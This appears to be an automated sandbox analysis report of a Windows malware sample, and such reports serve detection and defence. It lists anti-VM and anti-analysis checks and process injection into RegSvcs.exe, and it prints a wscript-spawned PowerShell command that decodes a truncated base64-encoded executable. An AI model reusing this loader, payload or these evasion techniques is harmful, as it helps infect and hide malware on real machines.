Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3736			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3392			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99244	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000003.302307322.000001D52CD5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}x
Source: RegSvcs.exe, 00000003.00000002.831596259.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
Source: powershell.exe, 00000001.00000003.310430015.0000028B4A593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 972008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapyk
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapyk			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALAZ+mMAAAAAAAAAAOAAAiELAVAAACYAAAAGAAAAAAAAskQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBEAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAuCQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACURAAAAAAAAEgAAAACAAUAxCgAAOQaAAADAAAAAAAAAKhDAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABMwBABAAAAAAQAAEXIhAABwCxYrARZFAgAAAAIAAAAYAAAAKx8XDAd+IAAACgIXKBsAAAYsBxcKFyvbKw0IF9YMGCvSCBsx3xYKBiobMAoABQQAAAIAABFylQAAcAIoIQAACgwWKwEWRQMAAAACAAAADQAAABgAAAArIRID/hUPAAACFyviEgT+FQ4AAAIYK9cSAxZ9GAAABBkrzBID0A8AAAIoDwAACigiAAAKuH0NAAAEAygjAAAKLQ0IcqEAAHADKCQAAAoMAgh+JQAACn4lAAAKFhp+JQAAChQSAxIEKBAAAAYtBnMmAAAKegQfPCgnAAAKEwUWKwEWRRQAAAAFAAAAFQAAACQAAAAzAAAAdAAAAMAAAADTAAAA8gAAAAIBAABQAQAAZQEAAG8BAACIAQAAnAEAALABAADIAQAA3gEAAA0CAAAsAgAAXQIAADhxAgAABBEFHzTWKCcAAAoTBhcrliCzAAAAjQkAAAETBxgrhxEHFiACAAEAnhk4eP///ygoAAAKGjMWEQR7CgAABBEHKBEAAAYtHHMmAAAKehEEewoAAAQRBygSAAAGLQZzJgAACnoRBx8plBMIGjg3////EQR7CQAABBEIHtYSCRoSASgVAAAGLQZzJgAACnoRBhEJMxYRBHsJAAAEEQkoFwAABiwGcyYAAAp6BBEFH1DWKCcAAAoTChs46/7//wQRBR9U1ignAAAKEwscONj+//8RBHsJAAAEEQYRCiAAMAAAH0AoGAAABhMNHTi5/v//BS0lEQ0tIRcTDB44qf7//xEEewkAAAQWEQogADAAAB9AKBgAAAYTDRENLQZzJgAACnoRBHsJAAAEEQ0EEQsSASgWAAAGLQZzJgAACnoRBSD4AAAA1hMOHwk4W/7